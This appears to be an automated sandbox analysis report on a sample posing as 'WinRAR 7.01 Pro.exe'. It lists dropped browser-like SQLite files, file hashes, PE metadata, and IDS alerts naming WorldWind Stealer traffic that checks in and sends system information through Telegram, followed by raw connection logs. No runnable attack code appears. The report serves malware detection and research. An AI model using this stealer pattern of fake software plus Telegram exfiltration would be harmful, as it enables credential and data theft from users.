                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.7873599747470391
                                                          Encrypted:false
                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                          Category:dropped
                                                          Size (bytes):159744
                                                          Entropy (8bit):0.7873599747470391
                                                          Encrypted:false
                                                          SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                          MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                          SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                          SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                          SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):106496
                                                          Entropy (8bit):1.1358696453229276
                                                          Encrypted:false
                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):114688
                                                          Entropy (8bit):0.9746603542602881
                                                          Encrypted:false
                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                          Category:dropped
                                                          Size (bytes):49152
                                                          Entropy (8bit):0.8180424350137764
                                                          Encrypted:false
                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):126976
                                                          Entropy (8bit):0.47147045728725767
                                                          Encrypted:false
                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                          Category:dropped
                                                          Size (bytes):98304
                                                          Entropy (8bit):0.08235737944063153
                                                          Encrypted:false
                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                          Category:dropped
                                                          Size (bytes):5242880
                                                          Entropy (8bit):0.037963276276857943
                                                          Encrypted:false
                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\WinRAR 7.01 Pro.exe
                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3961960
                                                          Entropy (8bit):7.9539697162180145
                                                          Encrypted:false
                                                          SSDEEP:98304:xNdBfKEgzVQYAO52weo3VudIlHSTNWA0rkjEaxKdj:vytzAO52wLVu2oBWv7tj
                                                          MD5:5E2849BEF6A38ED0B163EA6128AFEA01
                                                          SHA1:D77E1467DCD5E6662A6B97DE35CB017579AF032A
                                                          SHA-256:6EC13E13059BAC123D839FDE5770DB2C87248EF862D21F5F818580287A365026
                                                          SHA-512:E20BCB346B114C5E6F8F0E82D2143A7C02FFC77056983336A011FBE8E292D8FA0ED8D2AEBAA6F665FFACFA1063F59A2788BC68BBE2605316D7791EEC3A1E1CFB
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.............u...u...u...v...u...p.P.u.J.....u.J.q...u.J.v...u.J.p...u...q...u...s...u...t...u...t...u.D.|...u.D.u...u.D.....u.D.w...u.Rich..u.........................PE..d...6.@f.........."....!.".....................@.............................@........<...`.........................................PO..4....O..P........n...`...?...K<..(...0..D...@...T.......................(....M..@............@......,A.......................text...~!.......".................. ..`.rdata... ...@..."...&..............@..@.data........p.......H..............@....pdata...?...`...@...Z..............@..@.didat..8...........................@..._RDATA..\...........................@..@.rsrc....n.......p..................@..@.reloc..D....0......................@..B................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.936142698769639
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                                                          • Win32 Executable (generic) a (10002005/4) 49.64%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • InstallShield setup (43055/19) 0.21%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          File name:WinRAR 7.01 Pro.exe
                                                          File size:4'492'800 bytes
                                                          MD5:1c8908102946928867ab16f2007b35cc
                                                          SHA1:7e08b98299e0195a013e53221e3c2efb149eb4ce
                                                          SHA256:e3635b82438e536636955e2fee251073b1038a7e00295a1e0efb003ad49965d5
                                                          SHA512:a559caedc7b00da23cb18607d0f2f05c6954a949dff0c8a4c25f6353163b70fd16722728878bb87c9db5cff86dc0252f967ebc26a66cb975af85f1361372a734
                                                          SSDEEP:98304:DaxGFtNdBfKEgzVQYAO52weo3VudIlHSTNWA0rkjEaxKd:DRdytzAO52wLVu2oBWv7t
                                                          TLSH:2D26231AF6D441F5E077D234C8E28917E6B23C995B71868F27BD476A2F233905A3E342
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".f.................BD..H.......`D.. ....D...@.. ....................... E...........@................................
                                                          Icon Hash:b333313b693b9b19
                                                          Entrypoint:0x8460ee
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x66BB22B3 [Tue Aug 13 09:09:07 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4460a00x4b.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x44a0000x4210.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4500000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x4480000x1c.sdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x4440f40x4442009e58e021f6718753887cdc086bc1b61funknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .sdata0x4480000x9e0x200cc25252ffe7462a9704b133e9a3e6307False0.291015625data2.334243349008488IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x44a0000x42100x44005d7e7f7f9091382630d14d50f9482835False0.4547334558823529data5.16715779836387IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x4500000xc0x200f5d8a5c3347d0ccb15423a9a1c6d1a19False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0x44a5380x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.7375886524822695
                                                          RT_ICON0x44a9a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 40960.5356472795497186
                                                          RT_ICON0x44ba480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.4271784232365145
                                                          RT_GROUP_ICON0x44dff00x30data0.9166666666666666
                                                          RT_VERSION0x44a1900x3a8data0.3995726495726496
                                                          RT_MANIFEST0x44e0200x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                          DLLImport
                                                          mscoree.dll_CorExeMain
                                                          TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                          2024-08-13T21:48:56.915212+0200TCP2044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)149743443192.168.2.4149.154.167.220
                                                          2024-08-13T21:48:58.465995+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349744443192.168.2.4149.154.167.220
                                                          2024-08-13T21:49:01.755507+0200TCP2044557ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)149746443192.168.2.4149.154.167.220
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 13, 2024 21:48:53.965229034 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:53.970457077 CEST8049741104.16.185.241192.168.2.4
                                                          Aug 13, 2024 21:48:53.970526934 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:53.971620083 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:53.976574898 CEST8049741104.16.185.241192.168.2.4
                                                          Aug 13, 2024 21:48:54.482363939 CEST8049741104.16.185.241192.168.2.4
                                                          Aug 13, 2024 21:48:54.568281889 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:54.568365097 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:54.568453074 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:54.573107958 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:54.575643063 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:54.575678110 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.047085047 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.047173023 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:55.050858974 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:55.050890923 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.051305056 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.089519024 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:55.132546902 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.865756989 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.865844011 CEST44349742104.21.44.66192.168.2.4
                                                          Aug 13, 2024 21:48:55.865993023 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:55.867891073 CEST49742443192.168.2.4104.21.44.66
                                                          Aug 13, 2024 21:48:55.879841089 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:55.888192892 CEST8049741104.16.185.241192.168.2.4
                                                          Aug 13, 2024 21:48:55.888246059 CEST4974180192.168.2.4104.16.185.241
                                                          Aug 13, 2024 21:48:55.892039061 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:55.892122030 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:55.892219067 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:55.892541885 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:55.892577887 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.650579929 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.650707960 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:56.663007975 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:56.663048029 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.663769960 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.665348053 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:56.665412903 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.915250063 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.915306091 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.915381908 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:56.915421009 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.915448904 CEST44349743149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:56.916151047 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:56.918689966 CEST49743443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:57.032605886 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:57.032692909 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:57.032799959 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:57.033045053 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:57.033078909 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.180757046 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.182640076 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.182693958 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.466059923 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.466219902 CEST44349744149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.466415882 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.466969013 CEST49744443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.614240885 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.614330053 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:58.618412018 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.619055986 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:58.619132996 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:59.877773046 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:48:59.879887104 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:48:59.879945993 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.247746944 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.247824907 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.248842001 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.248856068 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249043941 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249089956 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249212027 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249249935 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249281883 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249296904 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249347925 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249382973 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249404907 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249412060 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249463081 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249562025 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249602079 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249692917 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249775887 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.249866009 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249979973 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.249986887 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.250026941 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.250088930 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.250103951 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.432454109 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.479352951 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.838864088 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.839025974 CEST44349745149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.839098930 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.839462996 CEST49745443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.841104984 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.841164112 CEST44349746149.154.167.220192.168.2.4
                                                          Aug 13, 2024 21:49:00.841244936 CEST49746443192.168.2.4149.154.167.220
                                                          Aug 13, 2024 21:49:00.841509104 CEST49746443192.168.2.4149.154.167.220
